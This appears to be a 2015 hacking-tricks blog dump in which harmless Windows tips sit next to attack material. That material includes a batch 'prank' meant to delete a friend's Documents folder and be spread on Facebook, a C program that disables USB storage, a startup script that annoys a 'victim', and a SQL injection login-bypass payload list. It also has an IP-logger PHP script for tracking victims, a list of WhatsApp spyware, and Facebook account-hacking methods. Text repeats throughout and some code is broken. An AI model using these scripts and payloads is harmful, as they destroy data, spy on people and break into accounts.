Saturday 5 December 2015
Thursday 5 November 2015
How To Block Websites Without Software
How To Block
Websites Without Software
Steps:
1) Browse C:\WINDOWS\system32\drivers\etc
2) Find the file named "HOSTS"
3) Open it in notepad
4) Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblock.com , and that site will no longer be accessable.
5) Done!
-So-
127.0.0.1 localhost
127.0.0.2 www.blockedsite.com
-->www.blockedsite.com is now unaccessable<--
For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.
IE:
127.0.0.3 www.site2.com
127.0.0.4 www.site3.com
127.0.0.5 www.site4.com
1) Browse C:\WINDOWS\system32\drivers\etc
2) Find the file named "HOSTS"
3) Open it in notepad
4) Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblock.com , and that site will no longer be accessable.
5) Done!
-So-
127.0.0.1 localhost
127.0.0.2 www.blockedsite.com
-->www.blockedsite.com is now unaccessable<--
For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.
IE:
127.0.0.3 www.site2.com
127.0.0.4 www.site3.com
127.0.0.5 www.site4.com
How to reset BIOS password using cmd
'I am going to tell you how
to reset BIOS Password using Command Prompt.
YES!!
We can do it by using MS DOS Command.
This method works only if
you have access to the system when its turned on because this method requires
MS DOS. Open MS DOS from programs
menu and provide following commands one bye one:
debug
o 70 2E
o 71 FF
quit
NOTE:
menu and provide following commands one bye one:
debug
o 70 2E
o 71 FF
quit
NOTE:
The first character in the
above commands is "O" and not the number 0.
After providing the above commands, restart your system and it should reset the CMOS Settings along with the BIOS password.
If you are curious to know how it works? then let me explain the above commands:
In this method we are using the Debug tool of MS DOS.
After providing the above commands, restart your system and it should reset the CMOS Settings along with the BIOS password.
If you are curious to know how it works? then let me explain the above commands:
In this method we are using the Debug tool of MS DOS.
The "O"
character present at first in these commands, outputs the values to IO ports.
The number 70 and 71 are
port numbers which are used to access CMOS memory.
By providing FF value we
are telling CMOS that there is an invalid checksum and it resets the CMOS
settings as well as BIOS password.
Install any Software within 10 minutes
Today I am going to
tell you how to install XP or any other operating system within 10
minutes.
Not only Operating Systems,
but this process speeds up installation of any other software also.
You may use
this trick to speed up installation of .NET framework, Photoshop or any other
software that takes much more time. We all know that after loading the file or
copying the file from the boot disk to temporary space the system requires a
first time reboot.
Ø Type "taskmgr" without quotes to open task
manager.
Ø Go to "processes" tab.
Ø There we will find that a process is running named
setup.exe
Ø Now our task is to make the priority of this process
maximumm by right clicking on that.
Ø Right click on that. Click set priority and then set
priotity to above normal or Real time.
We are done.
Note: This trick of setting priority can be applied to
any software that takes much more time in installation like Visual Studio, MS
Office, Adobe photoshop etc.
Check whether your computer is male or female
Check whether your
computer is male or female
I am going to tell you to
make a small script that will tell you to analyze gender of your computer.
Follow these steps:
1. Open Notepad
2. Type the following line
in notepad:
CreateObject("SAPI.SpVoice").Speak"Good
Morning"
3. Save file as-
"computer_gender.vbs"
4. Run the file.
If you
hear a male voice, you have a Male Computer
If you hear a female
voice, you have a female Computer.
Increase Virtual RAM
Increase
Virtual RAM
I am going to tell you a
trick that will increase your RAM virtually which will boost up your system.
Steps :-
1) Hold down the
'Windows' key and Press the 'Pause/Break' button at the top right of your
keyboard.
Another way is
Right-Clicking 'My Computer' and then Select 'Properties'.
2) Click on the
'Advanced' tab.
3) Under
'Performance', click 'Settings'.
4) Then click the
'Advanced' tab on the button that pops up.
5) Under 'Virtual
Memory' at the bottom, click 'Change'.
6) Click the 'Custom
Size' button.
7) For the initial
size (depending on your HD space), type in anywhere from 1000-1500 (although I
use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I
use 6000).
8) Click 'Set', and
then exit out of all of the windows.
9) Finally, Restart
your computer.
10) You now have a
faster computer and 1-2GB of Virtual RAM..!
Delete My Document folder of your enemy
Delete My Document folder of your enemy
Hello friends, today I
will show you a simple prank that will delete My Document folder from your
friends computer. This is quite simple. You have to make a batch file that will
contain code for deleting the folder. Give it to any of your friend. For mass
affect, you may upload it on Social media like facebook.
Give it a good name so
that anyone can be eager to open the file.
STEPS:
1. Open Notepad and copy
paste the following code in it.
rmdir C:\Documents and
Settings \S\Q.
2. Save it as Virus.bat (any
interesting name with .bat extension).
Now if you give this to
someone and if he runs this program then his My Document folder will be
deleted.
Warning:
Run this code at your own risk.
Make a trojan virus fake message
I am going to tell you how
to make a virus using notepad.
This is actually not a
virus but a trick to fool your friends. They will understand that this is a
virus.
Follow the instructions
1)Open the notepad and
paste the following code.
2)Save it as
"trojan.bat".
x=msgbox("Hi!!! Your computer is under risk. It
contains viruses that cant be removed by your antivirus software." ,
,"Trojan detected...")
When you click on this
file then, it will say "Hi!!! Your computer is under risk. It contains
viruses that cant be removed by your antivirus software".
You can change the message to any message you want.
After you are done with all send this batch file to
your friend. He will get surprised that his PC is affected by trojan horse.
Enjoy :)
How to make GIF animation in Adobe Photoshop
There are
a lot of software available to do this, but Photoshop is interesting one.
Before using this trick, your system must have Adobe Photoshop and Adone imageready installed.
Before using this trick, your system must have Adobe Photoshop and Adone imageready installed.
1) Open Photoshop 5.5 (any
version) and create a new image file measuring 100 by 100 pixels. Set the
resolution to 72 pixels per inch and the mode to RGB color.
2)Choose Show Layers from
the Window menu. This will bring up the Layers floating palette.
3)Select the pencil tool.
Use it to draw a picture.
4)Click on the Layer
palette's submenu arrow and select Duplicate Layer.
5)Click on the eyeball
icon to the left of the bottom layer on the Layer palette. Use the pencil tool
to add to the image on the top layer. Select the erase tool to remove part of
the image.
6)Under the file menu,
select Jump to, and then Adobe ImageReady 2.0. Save when prompted.
Animating in
ImageReady
1)Choose Show Animation
from the Window menu. This will bring up the Animation floating palette.
2)Click on the Animation
palette's submenu arrow and select Make Frames from Layers.
3)Use Save Optimized As to
save the animation under a new name
Make Birthday animation using command prompt
Make
Birthday animation using command prompt
Steps:
1. Open Notepad.
2. Copy and paste the
following code in a notepad and save it as "Birthday.bat". In fact,
you can give any name with extension *.bat (birthday.bat)
Double click on this batch
file and see the animation.
You can present it to your
friend.
Codes are:
@echo off
echo H
ping localhost -n 2 >nul
cls
echo Ha
ping localhost -n 2 >nul
cls
echo Hap
ping localhost -n 2 >nul
cls
echo Happ
ping localhost -n 2 >nul
cls
echo Happy
ping localhost -n 2 >nul
cls
echo Happy
ping localhost -n 2 >nul
cls
echo Happy B
ping localhost -n 2 >nul
cls
echo Happy Bi
ping localhost -n 2 >nul
cls
echo Happy Bir
ping localhost -n 2 >nul
cls
echo Happy Birt
ping localhost -n 2 >nul
cls
echo Happy Birth
ping localhost -n 2 >nul
cls
echo Happy Birthd
ping localhost -n 2 >nul
cls
echo Happy Birthda
ping localhost -n 2 >nul
cls
echo Happy Birthday
ping localhost -n 2 >nul
cls
echo Happy Birthday
ping localhost -n 2 >nul
cls
echo Happy Birthday t
ping localhost -n 2 >nul
cls
echo Happy Birthday to
ping localhost -n 2 >nul
cls
echo Happy Birthday to
ping localhost -n 2 >nul
cls
echo Happy Birthday to y
ping localhost -n 2 >nul
cls
echo Happy Birthday to yo
ping localhost -n 2 >nul
cls
echo Happy Birthday to you
ping localhost -n 2 >nul
cls
echo Happy Birthday to you.
ping localhost -n 2 >nul
cls
echo Happy Birthday to you..
ping localhost -n 2 >nul
cls
echo Happy Birthday to you...
ping localhost -n 2 >nul
cls
echo Happy Birthday to you....
ping localhost -n 2 >nul
cls
echo Happy Birthday to you.....
ping localhost -n 2 >nul
cls
echo Happy Birthday to you......
ping localhost -n 2 >nul
cls
echo Happy Birthday to you.....
ping localhost -n 2 >nul
cls
echo Happy Birthday to you....
ping localhost -n 2 >nul
cls
echo Happy Birthday to you...
ping localhost -n 2 >nul
cls
echo Happy Birthday to you..
ping localhost -n 2 >nul
cls
echo Happy Birthday to you.
ping localhost -n 2 >nul
cls
echo Happy Birthday to you
ping localhost -n 2 >nul
cls
echo Happy Birthday to you
ping localhost -n 2 >nul
cls
echo Happy Birthday to you.
ping localhost -n 2 >nul
cls
echo Happy Birthday to you..
ping localhost -n 2 >nul
cls
echo Happy Birthday to you...
ping localhost -n 2 >nul
cls
echo Happy Birthday to you....
ping localhost -n 2 >nul
cls
echo Happy Birthday to you.....
ping localhost -n 2 >nul
cls
echo Happy Birthday to you......
ping localhost -n 2 >nul
cls
RESULT AFTER RUNNING IT :
Toggle caps lock automatically
Toggle caps
lock automatically
Hello Friends, I think all
of you have seen disco light effect in which light is turning on/off
continuously.
I am going to tell a small
VB script, which will toggle caps lock key infinitely at interval of 0.1 sec.
You can perform the same
with other keys like Num lock and Scroll lock.
I am
performing with Caps lock because an LED Glows with Caps lock On and you can
see effect of disco light with it or you can irritate your victim by installing
this script at start-up.
Follow the Steps :
1.) Open Notepad and copy
the script given below into your notepad.
Set wshShell
=wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
2.) wscript.sleep 100 :
Here 100 is the sleep interval between toggle in milliseconds
3.) Now Save it with
extension as .vbs , like "script.vbs"
4.) Run it & see the
magic.
Note : You can change the do loop to For loop. You can
edit the Do Loop to control it with a counter Variable.
Make a Text to speech converter
Today I am
going to you to make a small program using notepad which will speak for
you, whatever you type in it. In short, its a text to speech converter made by
you through notepad and without knowing any programming skill.
Steps:
1. Open notepad.
2. Copy and paste
following code and save it as "speaker.vbs":
Dim userinputuserinput
userinputuserinput = inputbox("Type below to hear
your computer speak")
set sapi =
wscript.createobject("SAPI.Spvoice")
Sapi.speak userinputuserinput
3. Double click on speaker.vbs.
A dialog box will be opened like
4. Type anything in
English. Your computer will speak for you.
DONE!
Below is the screenshort of the program
USB Pen Drive Virus
USB Pen Drive Virus
Virus is a program which infects computer, in different way. I am explaining
about a Virus Which can easily be made in C or C++. When we have run .exe file
of this Pendrive-usb virus then when we connect pendrive with our computer
usb,it will not be connected. Operating System would not be able to detect
pendrive.
Code is written to
directly change the usb registry option and change its key.
Ø Creating usb-pendrive Virus :-
Install Turbo C or C++Open
TC.exe and there write the coding
#include<stdio.h>
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet
\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");
}
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet
\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");
}
Save The Above Program as usbblock.c or any other name.Compile and Run the above Program Congratulation! you are succesfull to create the usb-pendrive Virus.
Now go to drive where C is
installed (Open TC folder) and then BIN ,have that usb-pendrive virus
usbblock.exe to be used & Run that usbblock.exe in your computer to test.
Attach Pendrive to your
computer usb ....OH! Shit Pendrive doesn't get detected...virus Dont infect any other computer as it is
only for educational purpose
Ø To reverse the effect of USB-Pendrive Virus (Removal
of that Virus) :-
Install Turbo C or C++
Open TC.exe and there
write the coding
#include<stdio.h>
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\
Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
}
Save The Above Program as
unblockusb.c or any other name.
Compile and Run the above
Program
Congratulation! you are
succesfull to create .exe file to unblock USB
Now go to drive where C is
installed (Open TC folder) and then BIN ,have that unblockusb.exe to be used.
Run that unblockusb.exe to
reverse the effect of usbblock.exe.
Saturday 31 October 2015
Top 10 Best Hacking OS
Below is the List of Top 10 Hacking OS in 2015
You can download them and the links are given with them
List of Top 10 Hacking OS
1. Kali Linux
Kali Linux is a Debian-derived Linux configuration create for digital forensics and penetration testing. It’s maintained and funded by Offensive Security Ltd. Kali Linux updates its tools, and it’s available for many different platforms like VMware, ARM, and many more.2. BackBox
It’s a Linux distribution that’s based on Ubuntu. If you want to play safety assessment and penetration experiment, this software is the one that you should have in your repository. It active protects the IT infrastructure.3. Backtrack 5r3
This operating system is built keeping the savviest security personnel in mind as the audience. This is also a useful tool even for the early newcomers within the data safety discipline. It provides a fast and simple method to discover and also update the largest database ready for the security tools collection till date.4. SELinux
Security Enhanced Linux or SELinux is an upstream repository that’s used for various userland tools and books. There are various capabilities like policy compilation, policy management and coverage development which are combined in this utility tool along with SELinux services and utilities.5. Knoppix
Knoppix STD is a Live CD Linux configuration based on Knoppix that centered on PC safety instruments. It included GPL-licensed tools in the following categories, password cracking, authentication, encryption, forensics, honeypots, intrusion detection system, firewalls, network utilities, penetration, packet sniffers, assemblers, vulnerability assessment and wi-fi networking.6. Pentoo
Pentoo is a Live CD and Live USB designed for security assessment and penetration testing. Based on Gentoo Linux, Pentoo gives both as 32 and 64-bit installable live cd. The Pentoo kernel includes safety and PAX hardening and extra patches – with double compiled from a hardened toolchain with the latest nightly versions of some tools available.7. Live Hacking OS
Live Hacking OS is also based on Linux which has a big package of hacking tools useful for penetration testing or ethical hacking. It includes the graphical user interface GNOME inbuilt. There’s a second variation available which has a command line only, and it requires very fewer hardware requirements.8. Matriux Krypton
After Weakerth4n, this is perhaps the first distribution that’s directly based on the Debian Operating System. It provide an arsenal of 300 security tools and makes a good choice for ethical hacking, system and cyber forensics investigations, security testing, penetration testing and network administration etc.9. NodeZero Linux
NodeZero Linux is a powerful, reliable and stable. Based on the industry leading Ubuntu Linux distribution, NodeZero Linux needs all the stability and reliability that comes with Ubuntu’s Long Term Support model, and its power comes from the tools configured to live comfortably within the environment.10. DEFT
DEFT Operating System is based on the Linux Kernel 3 along with the Digital Advanced Response Toolkit. It uses WINE in order to run Windows tools Linux and predominantly run with the LXDE desktop environment.So above is all about Top 10 best hacking OS 2015. Hope you like it so please don’t forget to share this post with others.
Friday 23 October 2015
Find someone’s IP address: When chatting on facebook
First you got to find out the IP address of that User.
note: before trying this make sure you close all the other tabs in your browser, and only keep facebook open. Also if possible delete all the history and cache from your browser.
When command prompt opens Type the following command and hit Enter.
- netstat -an
The Next Step is to Trace that user using his IP address.
To do so we will be using IP tracer service. Go to the below address and paste the IP address in the box that says “lookup this ip or website”, and it will show you the location of the user.http://www.ip-adress.com/ipaddresstolocation/
It will show you all the information about that user along with his ISP and a Location in the MAP. Now in the MAP Just click on “click for big ip address location” in the big picture you can actually zoom in. and try to recognize the area. If any serious matter just note down the ISP details in that page and contact them about the IP. They will respond you.
Other netstat commands:
- -a Displays all connections and listening ports.
- -e Displays Ethernet statistics. This may be combined with the -s option.
- -n Displays addresses and port numbers in numerical form.
- -p Proto Shows connections for the protocol specified by proto; proto may be TCP or UDP.
- -s Option to display per-protocol statistics, proto may be TCP, UDP, or IP.
- -r Displays the routing table.
- -s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the
- -p Option may be used to specify a subset of the default.
netstat -an
Sunday 20 September 2015
Top 10 Ways to Hack Facebook Accounts [2015]
Top 10 Ways to Hack Facebook Accounts 2015
So below are
the Top 10 Ways to Hack Facebook Accounts :-
1. Facebook Phishing
Phishing still is the most
popular attack vector used for hacking facebook accounts, There are variety of
methods to carry out phishing attack, In a simple phishing attacks a hacker
creates a fake login page which exactly looks like the real facebook page and
then asks the victim to login into that page, Once the victim logins through
the fake page the victims “Email Address” and “Password” is stored in to a text
file, The hacker then downloads the text file and get’s his hands on the
victims credentials.
2. Keylogging
Keylogging, according to
me is the easiest way to hack a facebook password, Keylogging sometimes can be
so dangerous that even a person with good knowledge of computers can fall for
it. A keylogger is basically a small program which once is installed on victims
computer will record every thing which victim types on his/her computer. The
logs are then send back to the attacker by either FTP or directly to hackers
email address.
3. Stealers
Almost 80% percent people
use stored passwords in their browser to access the facebook, This is is
quite convenient but can sometimes be extremely dangerous, Stealers
are software’s specially designed to capture the saved passwords
stored in the victims browser, Stealers once FUD can
be extremely powerful.
4. Session Hijacking
Session Hijacking can be
often very dangerous if you are accessing Facebook on a http://
connection, In a Session Hijacking attack a hacker steals the victims browser
cookie which is used to authenticate a user on a website and uses to it
to access victims account, Session hijacking is widely used on Lan’s.
5. Sidejacking With Firesheep
Sidejacking attack went
common in late 2010, however it’s still popular now a days, Firesheep is widely
used to carry out sidejacking attacks, Firesheep only works when the attacker
and victim is on the same wifi network. A sidejacking attack is basically
another name for http session hijacking, but it’s more targeted towards wifi
users.
6. Mobile Phone Hacking
Millions of Facebook users
access Facebook through their mobile phones. In case the hacker can gain access
to the victims mobile phone then he can probably gain access to his/her
Facebook account. Their are lots of Mobile Spying softwares used to monitor a
Cellphone.
7. DNS Spoofing
If both the victim and
attacker are on the same network, an attacker can use a DNS spoofing attack and
change the original facebook.com page to his own fake page and hence can
get access to victims facebook account.
8. USB Hacking
If an attacker has physical access to
your computer, he could just insert a USB programmed with a function to
automatically extract saved passwords in the browser.
9. Man In the Middle Attacks
If the victim and attacker
are on the same lan and on a switch based network, A hacker can place himself
b/w the client and the server or he could also act as a default gateway and
hence capturing all the traffic in between, ARP Poisoning which is
the other name for man in the middle attacks is a very broad topic and is beyond
the scope of this article
10. Botnets
Botnets are not commonly
used for hacking facebook accounts, because of it’s high setup costs, They are
used to carry more advanced attacks, A botnet is basically a collection of
compromised computer, The infection process is same as the keylogging, however
a botnet gives you, additional options in for carrying out attacks with the
compromised computer. Some of the most popular botnets include Spyeye and Zeus.
Top WhatsApp Spywares 2015
Top WhatsApp Spywares 2015
1. iMobispy
(Available for Android, iOS, Blackberry, Windows Phone and Symbian devices)
(Available for Android, iOS, Blackberry, Windows Phone and Symbian devices)
2. StealthGenie
(Available for Android, iOS and Blackberry devices)
3. OwnSpy
(Available for Android and iOS devices)
4. MobileSpy
(Available for Android, iOS, Blackberry, Windows Phone and Symbian devices)
5. Mspy
(Available for Android, iOS, Blackberry, Windows Phone and Symbian devices)
6. FlexiSpy
(Available for Android, iOS, Blackberry and Symbian devices)
Common Methods used for Website Hacking
Common Methods used for Website Hacking
There are lots of methods that can be used
to hack a website but most common ones are as follows:
1.SQL Injection
2.XSS(Cross Site Scripting)
3.Remote File Inclusion(RFI)
4.Directory Traversal attack
5.Local File inclusion(LFI)
6.DDOS attack
1.SQL Injection
2.XSS(Cross Site Scripting)
3.Remote File Inclusion(RFI)
4.Directory Traversal attack
5.Local File inclusion(LFI)
6.DDOS attack
Tools commonly used to find a vulnerable website
1) Acunetix
Acunetix is one of my favorite tool to find a
venerability in any web application It automatically checks your web applications
for SQL Injection, XSS & other web vulnerabilities.
2) Nessus
Nessus is the best unix venerability testing tool and
among the best to run on windows. Key features of this software include Remote
and local file securitychecks a client/server architecture with a GTK graphical
interface etc.
3) Retina
Retina is another Vulnerability Assessment tool,It scans
all the hosts on a network and report on any vulnerabilities found.
Download Retina from the link below
http://www.eeye.com/downloads
http://www.eeye.com/downloads
4)Metasploit Framework
The Metasploit Framework is the open source penetration
testing framework with the world’s largest database of public and tested
exploits.
Download Metasploit from the link below :
http://www.metasploit.com/download/
http://www.metasploit.com/download/
Bypass Sms Verification [2015] [Updated]
Bypass
Phone and SMS verification of Any Website [2015] [Updated]
Steps :
1) First go to this
Website : Receive-Sms
Online
2) Copy any one number and
paste it where they are asking SMS Verification.
3) Simply come back and click the number which you have
selected, check it out there is your code sent by google, youtube or whatever
else.
Thursday 17 September 2015
Denial Of Service Explained (DOS)
DENIAL OF SERVICE
EXPLAINED (DOS)
Denial-of-service Attack is
a very famous and common attack we daily experience such attacks but we are not
able to figure it out.Let me define Denial-of-service
(DOS) for you a denial-of-service attack (DoS attack) or Distributed Denial-Of-Service attack (DDoS
attack) is an attempt to make a machine or network resource unavailable to its
intended users. What it means is sometimes we visit a website the website keeps
on loading and after a while the connection from the server breaks and we
get website not available error.Mostly high profile servers like bank servers,
credit card payment gateways and even social services servers are
targetted by hackers.
How Denial Of Service Works
A hacker tells one or more of his computers
contact a specific server or Web site repeatedly.The sudden increase in traffic
can cause the site to load very slowly for legitimate users. Sometimes the
traffic is enough to shut the site down completely.
Some of famous Methods of Attack
● Ping of Death - bots create huge electronic
packets and sends them on to victims
● Mail bomb - bots send a massive amount of
e-mail, crashing e-mail servers
● Smurf Attack - bots send Internet Control
Message Protocol (ICMP) messages to reflectors.
● Teardrop - bots send pieces of an
illegitimate packet; the victim system tries to recombine the pieces into a
packet and crashes as a result
● SYN flood-A SYN flood occurs when a host sends a
flood of TCP/SYN packets, often with a forged sender address.
● Permanent denial-of-service attacks - This attack
that damages a system so badly that it requires replacement or re-installation
of hardware.
● Denial-of-Service Level II -The goal of
DoS L2 attack is to cause a launching of a defense mechanism which blocks the
network segment from which the attack originated. In case of distributed attack
or IP header modification (that depends on the kind of security behavior) it
will fully block the attacked network from Internet, but without system crash.
TOOLS
LOIC (Low Orbit Ion Cannon)
LOIC was used by Project Chanology, a project by the
Anonymous group, to attack websites from the Church of Scientologythen
by Anonymous itself to successfully attack the Recording Industry Association of
America's website in October 2010,and again during Operation Payback in
December 2010 to attack the websites of companies and organizations that
opposed WikiLeaks.It is an open source network stress testing and
denial-of-service attack application, written in C#. LOIC was initially
developed by Praetox Technologies, but was later released into the public
domain,and now is hosted on several open source platforms.The software has
inspired the creation of an independent JavaScript version called JS LOIC, as
well as LOIC-derived web version called Low Orbit Web Cannon. These enable a
DoS from a web browser.LOIC performs a denial-of-service (DoS) attack (or when
used by multiple individuals, a DDoS attack) on a target site by flooding the
server with TCP packets or UDP packets with the intention of disrupting the
service of a particular host. People have used LOIC to join voluntary botnets.
HOIC (High
Orbit Ion Canon).
It is another dos tool it is not much famous like LOIC
but is very powerful and has a good GUI.It is windows executable.
HULK
HULK (Http Unbearable Load King) is a web server denial
of service tool written for research purposes. It is designed to generate
volumes of unique and obfuscated traffic at a webserver, bypassing caching
engines and therefore hitting the server's direct resource pool.
DOS
prevention
● Mitigation performance – high rate DDoS
must be mitigated by specialized hardware to withstand the attack load while
allowing legitimate traffic to pass through – e.g. Anti-DDoS solutions using
ASIC-based DDoS Mitigation Engines
● Reducing reaction time – Network
Behavioral Analysis (NBA) technology should be utilized to automatically and
accurately distinguish attack traffic from legitimate traffic – at all layers
including layer-7 (e.g. HTTP)
● Blocking multiple attack vectors –
using NBA, IPS and DoS technologies within a single Anti-DDoS solution ensures
no attack is overlooked during a multi-vector attack campaign.
● Firewalls like nexusguard,cloudflare
etc helps protect ddos attacks efficiently by providing reverse ip proxy and
limiting ping from a certain ip.
● Apart from Web Firewalls,Firewalls for system
like iptables and comodo are also very helpful in preventing ddos attacks. They
block the ip of the attacker which kick him off the server.
● Web Server matters most ddos attack fail to
exploit nginx.
● For bandwidth saturation attacks, make sure your
service provider can mitigate volumetric attacks that may saturate your
bandwidth.
Note : Always Configure your
firewalls,ports and other server mechanism correctly becuase I have seen
cases where the admin has not configured his firewall correctly and becomes a
victim of DDOS.
Note For Server Administrators: A fact is despite being designed to provide network security, firewalls and intrusion prevention systems (IPS) are impacted by DDoS attacks.To stop DDoS attacks you can also go for dedicated hardware solutions.
Tuesday 8 September 2015
Latest Hack Bar r0ot-K4jji-v1.6.5 Download
Hello Guys,
Today I am gonna share
with you the Latest hack bar which is Designed by KAZMI GUJJAR (Code name: R00T-k4jji)
Features
Features
·
Sqli basics
·
MYSQL ,MMSQL CHAR
·
UNION BASE
·
EURROR/DOUBLE
QUERY
·
JS-ON/OFF
·
LIVE HTTP
Header
·
TEMPER DATA
·
WAF BYPASS
·
*HTML
·
ENCRYPTION
·
XSS
Download it from here
Please comment below and share your valuable feedback :)
Thursday 27 August 2015
SQL Injection Authentication Bypass Cheat Sheet
This list can be used by penetration testers when
testing for SQL injection authentication bypass.A penetration tester can use it
manually or through burp in order to automate the process.The creator
of this list is Dr. Emin İslam TatlıIf (OWASP Board Member).If you have any
other suggestions please feel free to leave a comment in order to improve and
expand the list.
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
Thanks for visiting!
Please comment and share the post :)
Grab easily an IP with a simple PHP [100% WORKING]
Hello ,
I will show you today how to make your own working IP logger to grab any IP address you want !
Requirement :
-a PHP hosting ( a free one is perfect )
-a PHP script
-Filezilla or another FTP client
-a PHP hosting ( a free one is perfect )
-a PHP script
-Filezilla or another FTP client
First you will need a simple and free web hosting , don't buy one , a free hosting will be perfect
this is some free web hostings :
-http://ohost.de/
-http://www.000webhost.com/
-https://www.alwaysdata.com/
-http://it.altervista.org/
this is some free web hostings :
-http://ohost.de/
-http://www.000webhost.com/
-https://www.alwaysdata.com/
-http://it.altervista.org/
there are many more ...
Create an account on that free hosting websites, choose a domain and go to the FTP connection details, you must have three informations :
-host
-username
-password
-host
-username
-password
-Open filezilla ( or the FTP client of your choice) and connect to your FTP
THe PHP script :
Now you will need this code :
Code:
<?
$inF = fopen("./ip.ini", "a" ); //
fputs($inF, $REMOTE_ADDR."\n"); //
$hostname = $_SERVER["REMOTE_ADDR"];
$date_str = 'D d M Y H:i:s T(0)';
fputs($inF, date($date_str), $hostname."\n");
fputs($inF, $hostname."\n");
fclose($inF);
?>
Code:
<?
$inF = fopen("./ip.ini", "a" ); //
fputs($inF, $REMOTE_ADDR."\n"); //
$hostname = $_SERVER["REMOTE_ADDR"];
$date_str = 'D d M Y H:i:s T(0)';
fputs($inF, date($date_str), $hostname."\n");
fputs($inF, $hostname."\n");
fclose($inF);
?>
Copy it and paste it in a text document and name the file as you want , but with PHP extension , for example : logger.php
Now just upload that file to your website
You will now have an url like this one : http://yoursite.com/logger.php
This is the URL of your IP logger , so to grab an IP , you will just need to gave that link to your victim
Once your victim has visit your URL , just go to : http://yoursite.com/ip.ini to see the date , the hour and the IP of your victim like that :
Conclusion :
This method is simple and 100 % working , if your victim click on your link , you will receive his IP in instant on your website
